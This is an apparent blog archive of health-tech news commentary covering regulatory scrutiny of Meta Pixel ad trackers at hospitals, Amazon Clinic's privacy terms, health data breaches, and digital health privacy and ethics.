FTC, HHS OCR scrutiny tightens on third-party ad trackers, sends letter to 130 hospitals and telehealth providers

If you’ve checked on your legal department, they may resemble Pepper (left). Hospitals and telehealth companies have been put on notice by letter agencies HHS Office for Civil Rights (OCR) and the Federal Trade Commission (FTC) that personal health information–not just protected health information (PHI) covered by HIPAA–that can be transmitted to third-parties by ad trackers like Meta Pixel is now forbidden, verboten, not permitted. In the joint statement by OCR and FTC, hospitals, providers, and telehealth providers were explicitly told that use of these online trackers is being equated with violations of consumer privacy. Their release specified “sensitive information” such as health conditions, diagnoses, medications, medical treatments, frequency of visits to health care professionals, and where an individual seeks medical treatment. Hospitals and telehealth companies also cannot plead ignorance of what their developers did, as the responsibility is being put squarely on them to monitor the data going to third parties out of websites and apps. 

“The FTC is again serving notice that companies need to exercise extreme caution when using online tracking technologies and that we will continue doing everything in our powers to protect consumers’ health information from potential misuse and exploitation.” Samuel Levine, Director of the FTC’s Bureau of Consumer Protection, said. At OCR, which historically had its hands full with HIPAA violations and data breaches, their scope has broadened. “Although online tracking technologies can be used for beneficial purposes, patients and others should not have to sacrifice the privacy of their health information when using a hospital’s website,” said Melanie Fontes Rainer, OCR Director. “OCR continues to be concerned about impermissible disclosures of health information to third parties and will use all of its resources to address this issue.” Both HHS and FTC can take action without the time-consuming legal actions that DOJ must undertake.

True to FTC’s renewed use of the 2009 Health Breach Notification Rule, the letter sent to 130 hospital systems and telehealth providers came down hard on anything that could be interpreted as personal health information. Even for health organizations not covered by HIPAA, the letter is explicit on their obligation to protect against disclosure to third parties and to monitor the flow to third parties even if not used for marketing. Without explicit consumer authorization, it can “violate the FTC Act as well as constitute a breach of security under the FTC’s Health Breach Notification Rule.” Previous TTA coverage on third-party trackers and FTC actions here. Health IT Security

Between the DOJ and FTC alone, with actions on ad trackers and changes to antitrust guidelines, they have made the spring and summer of 2023 a most interesting and busy one for hospital and healthcare company legal departments. It’s even more amazing that given this background and on notice, Amazon just keeps flouting basic regulations about health information usage, such as for Amazon Clinic–which to date has not rolled out. TTA 27 June

Amazon Clinic delays 50-state telehealth rollout due to Federal data privacy, HIPAA concerns on user registration, PHI–is it a warning?

Amazon delaying Amazon Clinic national rollout from today (27 June) to 19 July. Amazon Clinic, which debuted last November as an asynchronous, message-based telehealth consult or prescription renewal referral platform [TTA 16 Nov 2022], has run once again into Federal scrutiny. This time, it’s two Senators from New England–the well-known Elizabeth Warren (D-MA) and the little-known Peter Welch (D-VT)–who are poking Amazon with the stick of whether sensitive health and personal data are flowing into Amazon’s other databases.

Their letter to CEO Andy Jassy was fair warning that, as this Editor predicted last February (see the list of open issues) after the One Medical buy closed to high-fives all around, the government is nowhere near finished with scrutinizing Amazon and how personal data, including health data, flows between their units and is monetized. 

In a two-page letter dated 16 June based on reporting in the Washington Post (100% owned by Amazon’s 12.6% shareholder and controller, Jeff Bezos–the irony runs deep here), the two senators believe that they have caught Amazon but good–and with some of the goods. 

  • Users of the Amazon Clinic service are asked, in the registration form, to authorize the “use and disclosure of protected health information.” They are told that agreement to this gives Amazon access to the “complete patient file” and that this information “may be re-disclosed,” after which it will “no longer be protected by HIPAA”. By agreeing to this, users waive any HIPAA personal health information protections.
  • If the user declines to agree, they are redirected and unable to complete Amazon Clinic registration and denied care. HIPAA regulations specifically prohibit conditioning care on agreement to disclose patient information. (This is known by anyone who has taken required training or certification on HIPAA when working for health plans or other regulated healthcare providers including RPM and telehealth vendors.)

The letter raises the sensible, usual questions on why personal data is being collected and what Amazon is doing with it. For instance, it requests responses on how patient data is used by Amazon, what data is shared with third-party entities, and what data is used in any analytics or algorithms. It cites as a non-compliance example the $1.5 million that GoodRx paid in an FTC penalty on their past Meta Pixel usage for ad tracking. (Interestingly avoiding the $7.5 million Teladoc paid for similar ad tracker misuse by BetterHelp.)

The $30/visit service has been available in 33 states since last year and currently through asynchronous messaging, provides care for minor conditions such as UTIs, herpes, and skin infections. The expansion will cover all 50 states and add synchronous video telehealth.

One would think that with billions on the line with One Medical, Amazon would be more cautious about poking the Antitrust Bear. They have already been put on notice by the Federal Trade Commission, the Department of Justice (DOJ), Congress, and multiple states. For Amazon Clinic, requiring individuals to waive their right to protect their PHI in registering for the service is downright brazen. How this got past their legal and compliance departments boggles the mind. Why Amazon is not ‘hiving off’ PHI collected through this small service is another question. Doing so would show to FTC and DOJ that Amazon can play by the rules. Instead, it confirms the widely held belief of those in healthcare that Amazon culturally cannot deal with the restrictions that come with the territory. Are they deliberately ‘playing chicken’ with the Feds? Pollo loco? This up-to-the-line behavior tends not to end well, as the telemental health providers that over-prescribed controlled substances found out.  POLITICO, The Hill, mHealth Intelligence

FTC takes off the gloves, v2: a walk on the technical side of ad pixel tracking

FTC explains its actions versus GoodRx and Teladoc’s BetterHelp. If ad trackers leave you a little “pixelated”, this FTC blog (who would have thunk?) is a decent explanation of what ad trackers, a/k/a third-party tracking pixels, do. They’re not evil, as some of the FTC statements would have you think, and have legitimate uses in tracking how your website pages are being used (and by whom). But GoodRx and BetterHelp in particular went too far in information gathering, sloppy handling, and monetizing customer information with third parties. 

  • Pixels, once tiny images, are now extensive bits of JavaScript or HTML code that send information back to the owner of the page they’re on. Consumers are of course totally unaware of their use.
  •  These codes can send back basic, non-identifiable, and useful information to marketers, such as pageviews, clicks, and interactions with ads or with their pages.
  • Unfortunately, code can be written to send back far more detailed information back to marketers, such as names, answers to questionnaires, email addresses, financial information, and more. Some of this can be hashed (a form of masking) but can be decoded. This is potentially sensitive information that needs to be handled carefully and with the assumption of confidentiality. 
  • As mentioned in our TTA articles, this information can be monetized by companies and provide an additional revenue stream. This type of information has value to ad networks (Apple, Microsoft, Google, Meta etc.), data brokers, social networks (Facebook, TikTok), advertisers, and others. 
  • Neither site asked permission from users to retain information nor to use it for third-party ad targeting.

The FTC blog then goes on to discuss their concerns and where FTC will go even more extensively into areas such as consumer harm and how companies manage the data. You don’t have to be a HIPAA-covered entity to fall under FTC’s purview–just capture consumer health data then share it with third parties or make deceptive representations.

Digital health companies are on notice to be concerned about yet another Federal three-letter agency. Expect more actions by FTC beyond GoodRx (getting off lightly at $1.5 million) and BetterHelp (dinged for $7.8 million which will somehow be returned to consumers). 

More gimlety views on CVS-Oak Street Health, Amazon-One Medical acquisitions

Perhaps this Editor is not that much of an Outlier in thinking that these deals don’t beat, say, sliced bread. Oak Street Health (OSH) disclosed its financials in an SEC 10-K filed on Tuesday. One must wonder what CVS is seeing in the company other than bulking up its primary care profile. Their loss grew to $510 million from 2021’s $415 million. While OSH grew impressively in 2022 with a 51% increase in revenue to $2.2 billion, driven by 40 new centers ending with a total of 169 facilities in 21 states, expenses grew exponentially for the new patients: medical claims expenses grew 48%, cost of care went up 49%, and sales and marketing up 38%. Scalable, so they claim; profitable, not till 2025 at earliest.

Other problems were revealed in the 10-K. OSH has substantial business from other payers, which may not be pleased that CVS owns a small payer called Aetna, though has pledged to keep OSH payer-neutral. OSH leases or licenses most of its care centers from Humana. That payer also accounted for 32% of its 2022 capitated revenue. Centene’s plans and HealthSpring made up an additional 23%. Other, more routine concerns are regulatory review, attrition of physicians and clinician staff, and last but not least, breakup fees ($500 million if CVS walks away, $300 million if it’s OSH). When you add these to other factors as outlined in our earlier article, such as the Medicare Advantage and high-need populations, CVS is cutting off a hefty slice of loaf, especially considering that the more complex Signify Health buy is due to close this quarter. Earlier opinions on the buy [TTA 16 Feb], Healthcare Dive

Now to Amazon and One Medical. This Editor received her invitation to buy a One Medical membership earlier this week (left). Countering this Editor’s analysis from last week, which maintains that Amazon is already under a broad antitrust microscope viewed by the Federal Trade Commission (FTC) and the Department of Justice (DOJ), Healthcare Dive counters, quite logically and in the view of their experts, that if either agency was going to object, they would have done so before the closing, and the grounds were likely too novel. The article concedes that the FTC could take action further down the road, for instance if Amazon violates HIPAA or consumer privacy with ad trackers. Instead, the focus is on objections by consumer groups, Amazon leveraging health data, privacy violations, and a general consumer unease around Amazon dealing with their health issues.

  • Consumer protection group Public Citizen urged regulators to block the deal in a letter to regulatory groups after it was announced last summer. For instance, it could bundle One Medical and Prime membership (a no-brainer). By tying the two together, Amazon could gain consent for using patient data from health records. Amazon could also serve ads for products related to medical conditions without that access (that old Pixel/ad tracker business again). These concerns are publicly shared by two FTC commissioners.
  • Analysts said that data acquisition was likely a big driving factor for the deal. After linking One Medical’s data with that from its other products and services, Amazon can analyze petabytes of healthcare data in the cloud and use the findings to better manage the health of One Medical’s Medicare population, build new products and pinpoint people with rare diseases to solicit participation in clinical trials, according to (market research firm) Forrester’s (Natalie) Schibell.” [Editor] That would, of course, require patient consent. 
  • Forrester noted that the consumer unease around Amazon in healthcare is substantial. 34% of surveyed adults weren’t at all comfortable with Amazon for healthcare needs with an additional 17% only somewhat more comfortable (tier 2). Trust levels are low, and it would take only one or two incidents, such as a security breach or HIPAA violations, to destroy it. This Editor would add that if One Medical practices were not managed impeccably, that would go viral among individual and corporate members, in a way that Amazon Care did not.

Let the lawsuits begin: Meta sued by health system patient for Meta Pixel info gathering

That was fast. Class action game on! Today’s reports of a class action lawsuit being filed against Meta Friday in the US District Court for the Northern District of California in San Francisco is going to be only the first. The ‘John Doe’ plaintiff, a patient of Baltimore-based Medstar Health System and a Facebook user, claims that he is filing on behalf of “millions of other Americans whose medical privacy has been violated by Facebook’s Pixel tracking tool.” Four law firms are involved in the lawsuit. It follows on last week’s investigative report by The Markup and STAT on the Meta Pixel tracker being used by 33 of the top 100 hospital systems [TTA 17 June].

The study indicates that the information gathered in the appointment booking form included IP address, doctor’s name, patient name, email address, phone number, zip code, and city of residence. When it’s put together with outside information, it can be considered a HIPAA violation.

The lawsuit alleges that the information was collected without consent. Neither Meta nor Facebook have a Business Associate Agreement (BAA) agreement in place covering them for gathering this information in any one of the 664 health systems using the Meta Pixel cited in the suit.

The suit requests compensatory and punitive damages for breach of contract, constitutional invasion of privacy, violation of the Electronic Communications Privacy Act, violation of the California Invasion of Privacy Act, and other allegations. The filing was captured by ReclaimTheNet.org. If you look at page 18, there are multiple statements from Meta/Facebook stating that advertising based on health is ‘inappropriate’, but then illustrates how Facebook goes ahead and does it anyway (!)

A small wrinkle: In a statement to HIPAA Journal, Medstar Health Systems claimed it does not use the Meta Pixel or any Facebook code on its website. It creates an issue of the plaintiff’s standing and harm.

FierceHealthcare, Becker’s, HealthITSecurity

Breaking: Hospitals sending sensitive patient information to Facebook through website ‘Meta Pixel’ ad tracker–study

Meta Pixel tracker sending appointment scheduling, patient portal information to Facebook–likely to become the Hot Story of next week. A study published jointly by The Markup and STAT examined the patient-facing areas of Newsweek’s 100 leading hospitals’ websites. It found that 33 of them permit the Meta Pixel ad tracker to send sensitive patient information back to Facebook. Ostensibly the reason is to better serve the patient with more tailored information, but what is not disclosed is what else Facebook is doing with the information. At a minimum, the information is the IP address–which HIPAA considers one of 18 identifiers that when linked to other personal information, can constitute data as protected health information.

Ad trackers like the Meta Pixel are used to target website visitors and also to track ads placed on Facebook and Instagram. Developers routinely permit these snippets of code as trackers for better performance and website tracking.

  • For 33 hospitals, the Pixel tracker is picking up and sending back to Facebook information from users of the hospital’s online appointment scheduler: the user’s IP, the text of the button, the doctor’s name, and the search term. In testing the sites using a team approach facilitated by a plug-in called Mozilla Rally, the testers found that in several cases, even more identifiable patient information was being sent: first name, last name, email address, phone number, zip code, and city of residence entered into the booking form.
  • Seven hospitals have the Pixel deep into another highly sensitive area–the password-protected patient portal. These go by various names, but a popular one is Epic’s MyChart. One surveyor found that for Piedmont Healthcare, the Pixel picked up the patient’s name, the name of their doctor, and the time of their upcoming appointment. For Novant Health, the information was even more detailed: name and dosage of medication in our health record, notes entered about the prescription about allergic reactions, and the button clicked in response to a question about sexual orientation. (Novant has since removed the Pixel.)

None of the hospitals using the Pixel have patient consent forms permitting the transmission of individual patient information, nor business associate agreements (BAAs) that permit this data’s collection.

The reaction of most of these hospitals was interesting. Some immediately removed it without comment. Others maintained that no protected information was sent using Pixel or otherwise defended its use. Houston Methodist was almost alone in providing a detailed response on how they used it, but subsequently removed it.

Facebook maintains that it does not use this information in any identifiable way and that from 2020 it has in place a sensitive health data filtering system and other safeguards. The New York Department of Financial Services, in a separate action monitoring Facebook in this area, questioned the accuracy of the filtering system. Even when the information is ‘encrypted’, it’s easy to break. Internal leaked Facebook documents indicate that engineers on the ad and business product team admitted as late as 2021 that they don’t have “an adequate level of control and explainability over how our systems use data, and thus we can’t confidently make controlled policy changes or external commitments such as ‘we will not use X data for Y purpose.” (quoted from Vice)

The study could not determine whether Facebook used the data to target advertisements, train its recommendation algorithms, or profit in other ways, but the collection alone can be in violation of US regulations. 

On the face of it, it violates patient privacy. But is it a HIPAA violation of protected health information? No expert quoted was willing to say that was 100% true, but a University of Michigan law professor who studies big data and health care said that “I think this is creepy, problematic, and potentially illegal” from the hospitals’ point of view. Some of the hospitals in their comments say that they vetted it. One wonders at this tradeoff.

To this Editor, Meta Pixel’s use in this way walks right up to the line and puts a few toes over.

If this is true of 33 major hospitals, what about the rest of them–smaller and less important than Columbia Presbyterian, Duke, Novant, and UCLA? What all of us have suspected is quite true–social media is collecting data on us and invading our privacy at every turn, and except for exposés like this, 99% of people neither know nor care that their private information is being used.

The Markup is continuing their “Pixel Hunt” series with childrens’ hospitals. A previous article is about Pixels tracking information from crisis pregnancy centers, about as sensitive as you can get. Also HISTalk.

Google’s Care Studio patient record search tool to pilot at Beth Israel Deaconess Medical Center

A cleaned-up Project Nightingale? Beth Israel Deaconess Medical Center (BIDMC) in Boston announced their participation in a pilot with Google of Care Studio, described in the BIDMC press release as “a technology designed to offer clinicians a longitudinal view of patient records and the ability to quickly search through those records through a single secure tool.” In other words, it’s like Google Search going across multiple systems: the BIDMC proprietary EHR (WebOMR), core medical record system, and several clinical systems designed for specific clinical specialties. All the clinician need do is type a term and the system will provide relevant information within their patient’s medical record from these systems, saving time and promoting accuracy. (See left)

The BIDMC pilot will use a limited group of 50 inpatient physicians and nurses, to assess the tool’s quality, efficacy, and safety of its use. Technical work starts this month.

At the end of the BIDMC release, it’s carefully explained that the tool is “designed to adhere to state and federal patient privacy regulations, including the Health Insurance Portability and Accountability Act of 1996 (HIPAA) and industry-wide standards related to protected health information. BIDMC and Google Health have entered into a Business Associate Agreement (BAA) to ensure that both parties meet patient privacy obligations required under HIPAA. BIDMC patient data will be stored and maintained in a protected environment, isolated from other Google customers.” (Editor’s emphasis) The BAA was inked in 2018.

Without referring to it, it addresses the controversy surrounding Google’s Project Nightingale and Ascension Health, a major privacy kerfuffle pre-COVID that broke in early November 2019. From the TTA article, edited: “Google’s BAA allowed them apparently to access in the initial phase at least 10 million identified health records which were transmitted to Google without patient or physician consent or knowledge, including patient name, lab results, diagnoses, hospital records, patient names and dates of birth.” Ascension maintained that everything was secure and Google could not use data for marketing or other purposes not connected to the project, but handling was under wraps and Google employees had access to the data. Ascension’s core agreement was about migration of data to Google Cloud and providing G Suite tools to clinicians and employees. But apparently there was also a search tool component, which evolved into Care Studio.

Health and Human Services (HHS) Office of Civil Rights, which governs privacy, announced at the time an investigation. The only later reference this Editor was able to locate was in HIPAA Journal of 5 March 2020 regarding the request of three Senators from both sides of the aisle demanding an explanation on the agreements and what information Google employees accessed. The timing was bad as then COVID hit and all else went out the window. In short, the investigations went nowhere, at least to the public.

It would surprise this Editor if any questions were raised about Care Studio, though BIDMC’s goal is understandable and admirable. Also Becker’s Hospital Review, FierceHealthcare

Will the rise of technology mean the fall of privacy–and what can be done? UK seeks a new National Data Guardian.

Can we have data sharing and interoperability while retaining control by individuals on what they want shared? This keeps surfacing as a concern in the US, UK, Europe, and Australia, especially with COVID testing.

In recent news, last week’s acquisition of Ancestry by Blackstone [TTA 13 August] raised questions in minds other than this Editor’s of how a business model based on the value of genomic data to others is going to serve two masters–investors and its customers who simply want to know their genetic profile and disease predispositions, and may not be clear about or confused about how to limit where their data is going, however de-identified. The consolidation of digital health companies, practices, and payers–Teladoc and Livongo, CVS Health and Aetna, and even Village MD and Walgreens–are also dependent on data. Terms you hear are ‘tracking the patient journey’, ‘improving population health’, and a Big ’80s term, ‘synergy’. This does not include all the platforms that are solely about the data and making it more available in the healthcare universe.

A recent HIMSS virtual session, reported in Healthcare Finance, addressed the issue in a soft and jargony way which is easy to dismiss. From one of the five panelists:  

Dr. Alex Cahana, chief medical officer at ConsenSys Health.”And so if we are in essence our data, then any third party that takes that data – with a partial or even complete agreement of consent from my end, and uses it, abuses it or loses it – takes actually a piece of me as a human.”

Dignity-Preserving Technology: Addressing Global Health Disparities in Vulnerable Populations

But then when you dig into it and the further comments, it’s absolutely true. Most data sharing, most of the time, is helpful. Not having to keep track of everything on paper, or being able to store your data digitally, or your primary care practice or radiologist having it and interpretation accessible, makes life easier. The average person tends to block the possibility of misuse, except if it turns around and bites us. So what is the solution? Quite a bit of this discussion was about improving “literacy” which is a Catch-22 of vulnerability– ‘lacking skill and ability’ to understand how their data is being used versus ‘the system’ actually creating these vulnerable populations. But when the priority, from the government on to private payers, is ‘value-based care’ and saving money, how does this prevent ‘nefarious use’ of sharing data and identifying de-identified data for which you, the vulnerable, have given consent, to that end? 

It’s exhausting. Why avoid the problem in the first place? Having observed the uses and misuses of genomics data, this Editor will harp on again that we should have a Genomic Data Bill of Rights [TTA 29 Aug 18] for consumers to be fully transparent on where their data is going, how it is being used, and to easily keep their data private without jumping through a ridiculous number of hoops. This could be expandable to all health data. While I’d prefer this to be enforced by private entities, I don’t see it having a chance. In the US, we have HIPAA which is enforced by HHS’ Office of Civil Rights (OCR), which also watchdogs and fines for internal data breaches. Data privacy is also a problem of international scope, what with data hacking coming from state-sponsored entities in China and North Korea, as well as Eastern European pirates.

Thus it is encouraging that the UK’s Department of Health and Social Care is seeking a new national data guardian (NDG) to figure out how to safeguard patient data, based on the December 2018 Act. This replaces Dame Fiona Caldicott who was the first NDG starting in 2014 well before the Act. The specs for the job in Public Appointments are here. You’ll be paid £45,000 per annum, for a 2-3 day per week, primarily working remote with some travel to Leeds and London. (But if you’d like it, apply quickly–it closes 3 Sept!). It’s not full time, which is slightly dismaying given the situation’s growing importance. The HealthcareITNews article has a HIMSS interview video with Dame Fiona discussing the role of trust in this process starting with the clinician, and why the Care.data program was scrapped. Of related interest is Public Health England’s inter-mortem of lessons learned in data management from COVID-19, while reportedly Secretary Matt Hancock is replacing it with a new agency with a sole focus on health protection from pandemics. Hmmmmm…..HealthcareITNews.

About time: digital health grows a set of ethical guidelines

Is there a sense of embarrassment in the background? Fortune reports that the Stanford University Libraries are taking the lead in organizing an academic/industry group to establish ethical guidelines to govern digital health. These grew out of two meetings in July and November last year with the participation of over 30 representatives from health care, pharmaceutical, and nonprofit organizations. Proteus Digital Health, the developer of a formerly creepy sensor pill system, is prominently mentioned, but attending were representatives of Aetna CVS, Otsuka Pharmaceuticals (which works with Proteus), Kaiser Permanente, Intermountain Health, Tencent, and HSBC Holdings.

Here are the 10 Guiding Principles, which concentrate on data governance and sharing, as well as the use of the products themselves. They are expanded upon in this summary PDF:

  1. The products of digital health companies should always work in patients’ interests.
  2. Sharing digital health information should always be to improve a patient’s outcomes and those of others.
  3. “Do no harm” should apply to the use and sharing of all digital health information.
  4. Patients should never be forced to use digital health products against their wishes.
  5. Patients should be able to decide whether their information is shared, and to know how a digital health company uses information to generate revenues.
  6. Digital health information should be accurate.
  7. Digital health information should be protected with strong security tools.
  8. Security violations should be reported promptly along with what is being done to fix them.
  9. Digital health products should allow patients to be more connected to their care givers.
  10. Patients should be actively engaged in the community that is shaping digital health products.

We’ve already observed that best practices in design are putting some of these principals into action. Your Editors have long advocated, to the point of tiresomeness, that data security is not notional from the smallest device to the largest health system. Our photo at left may be vintage, but if anything the threat has both grown and expanded. 2018’s ten largest breaches affected almost 7 million US patients and disrupted their organizations’ operations. Social media is also vulnerable. Parts of the US government–Congress and the FTC through a complaint filing–are also coming down hard on Facebook for sharing personal health information with advertisers. This is PHI belonging to members of closed Facebook groups meant to support those with health and mental health conditions. (HIPAA Journal).

But here is where Stanford and the conference participants get all mushy. From their press release:

“We want this first set of ten statements to spur conversations in board rooms, classrooms and community centers around the country and ultimately be refined and adopted widely.” –Michael A. Keller, Stanford’s university librarian and vice provost for teaching and learning

So everyone gets to feel good and take home a trophy? Nowhere are there next steps, corporate statements of adoption, and so on.

Let’s keep in mind that Stanford University was the nexus of the Fraud That Was Theranos, which is discreetly not mentioned. If not a shadow hovering in the background, it should be. Perhaps there is some mea culpa, mea maxima culpa here, but this Editor will wait for more concrete signs of Action.

Babylon Health’s ‘GP at hand’ not at hand for NHS England–yet. When will technology be? Is Carillion’s collapse a spanner in the works?

NHS England won’t be rolling out the Babylon Health ‘GP at hand’ service anytime soon, despite some success in their London test with five GP practices [TTA 12 Jan]. Digital Health cites an October study by Hammersmith and Fulham CCG (Fulham being one of the test practices) that to this Editor expresses both excitement at an innovative approach but with the same easy-to-see drawback:

The GP at Hand service model represents an innovative approach to general practice that poses a number of challenges to existing NHS policy and legislation. The approach to patient registration – where a potentially large volume of patients are encouraged to register at a physical site that could be a significant distance from both their home and work address, arguably represents a distortion of the original intentions of the Choice of GP policy. (Page 12)

There are also concerns about complex needs plus other special needs patients (inequality of service), controlled drug policy, and the capacity of Babylon Health to expand the service. Since the October report, a Babylon spokesperson told Digital Health that “Commissioners have comprehensively signed off our roll-out plan and we look forward to working with them to expand GP at Hand across the country.” 

Re capitation, why ‘GP at hand’ use is tied into a mandatory change of GP practices has left this Editor puzzled. In the US, telemedicine visits, especially the ‘I’ve got the flu and can’t move’ type or to specialists (dermatology) are often (not always) separate from whomever your primary care physician is. Yes, centralizing the records winds up being mostly in the hands of US patients unless the PCP is copied or it is part of a payer/corporate health program, but this may be the only way that virtual visits can be rolled out in any volume. In the UK, is there a workaround where the patient’s electronic record can be accessed by a separate telemedicine doctor?

Another tech head-shaker: 45 percent of GPs want technology-enabled remote working. 48 percent expressed that flexible working and working from home would enable doctors to provide more personalized care. Allowing remote working to support out-of-hours care could not only free up time for thousands of patient appointments but also level out doctor capacity disparities between regions. The survey here of 100 GPs was conducted by a cloud-communications provider, Sesui. Digital Health. This is a special need that isn’t present in the US except in closed systems like the VA, which is finally addressing the problem. The wide use of clinical connectivity apps enables US doctors to split time from hospital to multiple practices–so much so on multiple devices, that app security is a concern. 

Another head-shaker. 48 percent of missed NHS hospital appointments are due to letter-related problems, such as the letter arriving too late (17 percent), not being received (17 percent) or being lost (8 percent). 68 percent prefer to manage their appointments online or via smartphone. This preference has real financial impact as the NHS estimates that 8 million appointments were missed in 2016-2017, at a cost of £1bn. Now this survey of 2,000 adults was sponsored by Healthcare Communications, a provider to 100 NHS trusts with patient communications technology, so there’s a dog in the hunt. However, they developed for Barnsley Hospital NHS Foundation Trust a digital letter technology that is claimed to reduce outpatient postal letters by 40 percent. Considering my dentist sends me three emails plus separate text messages before my twice-yearly exam…. Release (PDF).

Roy Lilley’s daily newsletter today also engages the Tech Question and the “IT desert” present in much of the daily life of the NHS. Trusts are addressing it, junior doctors are WhatsApping, and generally, clinicians are hot-wiring the system in order to get anything done. It is much like the US about five to seven years ago where US HHS had huge HIPAA concerns (more…)

16 or 27 million 2016 breaches, 1 in 4 Americans? Data, IoT insecurity runs wild (US/UK)

What’s better than a chilly early spring dive into the North Sea of Health Data Insecurity?

[grow_thumb image=”https://telecareaware.com/wp-content/uploads/2017/03/Accenture-Health-2017-Consumer-Survey.jpg” thumb_width=”150″ /]Accenture’s report released in February calculated that 26 percent of Americans had experienced a health care-related data breach. 50 percent of those were victims of medical identity theft and had to pay out an average of $2,500 in additional cost. One-third (36 percent) believed the breach took place in hospitals, followed by urgent care and pharmacies (both 22 percent). How did they find out? Credit card and insurer statements were usual, with only one-third being notified by their provider. Interestingly, a scant 12 percent of data breach victims reported the breach to the organization holding their data. (You’d think they’d be screaming?) The samples were taken between November 2016 and January 2017. Accenture has similar surveys for UK, Australia, Singapore, Brazil, Norway, and Saudi Arabia. Release  PDF of the US Digital Trust Report

So what’s 16 million breaches between friends? Or 4 million? Or 27 million?

  • That is the number (well, 15.9 million and change) of healthcare/medical records breached in 2016 in 376 breaches reported by the Identity Theft Resource Center (ITRC), a Federally/privately supported non-profit. Healthcare, no surprise, is far in the lead with 34 percent and 44 percent respectively. The 272 pages of the 2016 End of Year Report will take more than a casual read, but much of its data is outside of healthcare.
  • For a cross-reference, we look to the non-profit Privacy Rights Clearinghouse which for many years has been a go-to resource for researchers. PRC’s 2016 numbers are lower, substantially so in the number of records: 301 breaches and 4 million records.
  • HIMSS and Healthcare IT News insist that ransomware is under-reported, (more…)

Summertime, and the health data breaches are easy….

[grow_thumb image=”https://telecareaware.com/wp-content/uploads/2015/02/Hackermania.jpg” thumb_width=”150″ /]Cybersecurity is the word, not the bird, from South Korea (see here) to the US.  The week opened with an unusual healthcare plan supplier breach: 3.3 million payer records held by a card issuer, Newkirk Products of Albany, NY. The company issues ID cards for several Blue Cross and Blue Shield plans and provides management services to other commercial payers. Ironically, it was discovered five days after their $410 million acquisition by Broadridge Financial Solutions of Lake Success, Long Island. On July 6, Newkirk discovered ‘unauthorized access’ to a server with records containing the member’s name, mailing address, type of plan, member and group ID number, names of dependents enrolled in the plan, primary care provider, and in some cases, date of birth, premium invoice information and Medicaid ID number. “No health plans’ systems were accessed or affected in any way” according to the release. MedCityNews, Newkirk release on notice

Another supplier breach affected another estimated 3.7 million patients at Arizona’s Banner Health. This one was a bit closer to home, hacking computer systems used in payment processing on debit and credit cards used at their food and beverage outlets in four states between June 23 and July 7.  A week later, the hackers gained unauthorized access to systems containing patient information, health plan member and beneficiary information, as well as information about physician and healthcare providers. MedCityNews, Banner Health release

But what’s secret anymore about your health data anyway? It’s all those apps that are sending data via your Apple Watch and your Fitbit which aren’t necessarily covered by HIPAA or secure. (more…)

90% of industries have had PHI data breach: Verizon (HIMSS Connected Health)

Reporting from the HIMSS Connected Health Conference (CHC)

Cybersecurity is one of the three central themes of this year’s HIMSS CHC, and excellent timing for releasing the highlights of Verizon’s first ever PHI (Protected Health Information) Data Breach Report. This is a spinoff of their extensive, eight years running international Data Breach Investigations Report (DBIR). 

It’s not just your doctor’s office, hospital or payer. It will be no surprise to our Readers that the healthcare sector is #7 in breaches–but that a PHI breach may come from non-healthcare (in US, HIPAA-covered) sources. This Editor spoke with Suzanne Widup, the lead author of the PHI Report and an info security/forensics expert, and included in that 90 percent are workers’ compensation programs, self-insured companies, the public sector, financial/insurance companies and–as a damper on this highly competitive (but hard to gauge results) area–wellness programs. Most organizations, according to Ms Widup, aren’t even conscious that they are holding this information and need to specially protect it from intrusion, as “PHI is like gold for today’s cybercriminal.”

Consistent with other authoritative tracking studies like Ponemon Institute’s and ID Experts’, the threat is from within: physical theft and loss, insider misuse and ‘miscellaneous’ account for 77 percent of theft. And as Bryan Sartin, managing director of Verizon’s RISK team noted in his keynote today, attacks take over a seven-month period on average to even be noticed. The breaches are long term, start small and sneaky. 2/3 of organizations don’t find out on their own, only when it starts to affect other partners. (Surprise!) Despite the proven Chinese and Black Vine involvement in several high profile, high-volume data hacks (Anthem), and ‘brute force’ hacks that make headlines (iCloud last year), the average breach is an inside job where “assets grow legs and walk off” in Dr Widup’s words, or privilege misuse.

When I asked Ms Widup about the Internet of Things (which is moving high on the hype curve, from what your Editor has experienced to the nth degree at this conference), she confirmed that this is an area that needs extra cybersecurity protection. (more…)

Seven safeguards for your mHealth app

With cyberattacks from all sources on the rise, and mHealth apps being used by providers in care coordination, telehealth, patient engagement and PHRs, Practice Unite, which has some experience in this area through designing customized app platforms for healthcare organizations’ patient and clinician communications, in its blog notes seven points for developers to keep in mind:

1. Access control– unique IDs assigned to each user, remote wiping of the mHealth app from any user’s device.
2. Audit controls
3. Authentication
4. Integrity controls, such as compartmentalization, to ensure that electronically transmitted PHI is not prematurely altered or corrupted
5. Transmission security: data encryption at rest, in transit, and on independently secured servers protects PHI at each stage of transmission
6. Third party app integration–must fully comply with HIPAA safeguards
7. Proprietary data encryption

But all seven points need backing from the top on down in a healthcare organization. (More in the article above)

“Data moves at the speed of trust”–RWJF report

The report issued today by the influential Robert Wood Johnson Foundation (RWJF), ‘Data for Health: Learning What Works’ advocates a fresh approach to health data through greater education on the value/importance of sharing PHI, improved security and privacy safeguards and investing in community data infrastructure. If the above quote and the first two items sound contradictory, perhaps they are, but current ‘strict’ privacy regulations (that’s you, HIPAA), data siloing and the current state of the art in security aren’t stemming Hackermania (or sheer bad data hygiene and security procedures). Based on three key themes, the RWJF is recommending a suite of actions (see below) to build what they term a ‘Culture of Health. All of which, from the 10,000 foot view, seem achievable. The need–and importantly, the perception of need–to integrate the rising quantity of data from all these devices, pry it out of its silos (elaborated upon earlier this week in ‘Set that disease data free!), analyze it and make it meaningful plus shareable to people and their doctors/clinicians keeps building. (‘Meaningful’ here is not to be confused with the HITECH Act’s Meaningful Use.)

But who will take the lead? Who will do the work? Will the HIT structure, infrastructure and very importantly, the legal framework follow? We wonder if there is enough demand and bandwidth in the current challenged system. Release. RWJF ‘Data for Health’ page with links to study PDF, executive summary which adds details to the recommendations below, more.[grow_thumb image=”https://telecareaware.com/wp-content/uploads/2015/04/Data-For-Health-Advisory-Committee-RWJF.png” thumb_width=”400″ /]

What happens when a medical app…vanishes?

You have just entered The App Twilight Zone…. Our readers know that concussion and diagnosis have been a focus of this Editor’s, and validating apps a focus of Editor Charles’, who brought this to my attention. The app’s name: The Sport Concussion Assessment Tool 2 (SCAT2). The news report states: “It contains all the essentials you would want in a concussion app: a graded symptoms checklist, cognitive testing, balance testing, Glasgow coma scale, Maddocks score, baseline score ability, serial evaluation, and password protected information-sharing via email.”  The plot: it was deactivated without warning or notice by the developer, Inovapp (link to sketchy CrunchBase profile) yet still listed on the iTunes store.

